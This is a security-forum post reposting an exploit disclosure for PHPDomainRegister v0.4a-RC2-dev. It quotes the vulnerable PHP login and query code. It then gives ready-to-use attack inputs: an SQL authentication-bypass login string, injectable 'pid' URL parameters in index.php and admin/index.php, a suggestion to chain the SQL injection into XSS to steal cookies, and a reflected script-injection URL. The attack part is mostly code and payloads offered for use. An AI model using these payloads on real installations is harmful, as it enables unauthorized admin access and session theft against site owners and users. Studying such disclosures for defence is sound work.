Jump to content
The_Arhitect

PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities

By The_Arhitect, in Exploituri

Recommended Posts

The_Arhitect Newbie

The_Arhitect

Posted
Posted

PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities

Title    = PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]
Author   = Or4nG.M4n
Download = http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar

This Bug Powered By : GooGLe
Thnks :
+----------------------------------+
|   xSs m4n i-Hmx Cyber-Crystal    |
|   Dr.Bnned ahwak2000 sa^Dev!L    |
+----------------------------------+

                                       SQL Auth Bypass
vuln : class_AjaxLogin.php line 73

  function is_login() { <<<<==== 1
        include ('../config.php'); <<<<==== 2
  if(isset($_POST['username']))  { <<<<==== 3
  $_SESSION['username']   = $_POST['username']; <<<<==== 4
         $password   = $_POST['password']; <<<<==== 5
         $strSQL     = <<<<==== 6
                     "SELECT
                                *
                        FROM
                                `".$_SQL_PREFIX . $USER_Table_Name."`
                        WHERE
                                `LOGIN_NAME` = '".$_SESSION['username']."'
                        AND
                                password = md5('".$password."');"; <<<<==== 7

            $result  = mysql_query ($strSQL); <<<<==== 8
            $row     = mysql_fetch_row($result); <<<<==== 9
            $exist   = count($row); <<<<==== 10
        if($exist >=2) { $this->jscript_location();  } <<<<==== 11

        [jscript_location]

          function jscript_location() { <<<<==== 12
            $this->set_session(); <<<<==== 13
        echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>"; <<<<==== 14


How i can Exploit this bug :
just login as = > admin ' or 1=1 #

                                      SQL injection
vuln
admin/index.php line 212

$sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";"; <<<<==== 1
$getpack = mysql_query($sql); <<<<==== 2

line 1079

        showPacket($pid); <<<<==== 3

vuln
index.php line 617

    $SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid'].""; <<<<==== 1
    $result = mysql_query($SQL); <<<<==== 2

Exploit Here :
index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details
admin/index.php?show=showPacket&pid=%injectionhere% Sql to xss to get cookie


                                     Cross Site Scrpting [xss]
admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>

Sursa: PHPDomainRegister v0.4a-RC2-dev Multiple Vulnerabilities

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...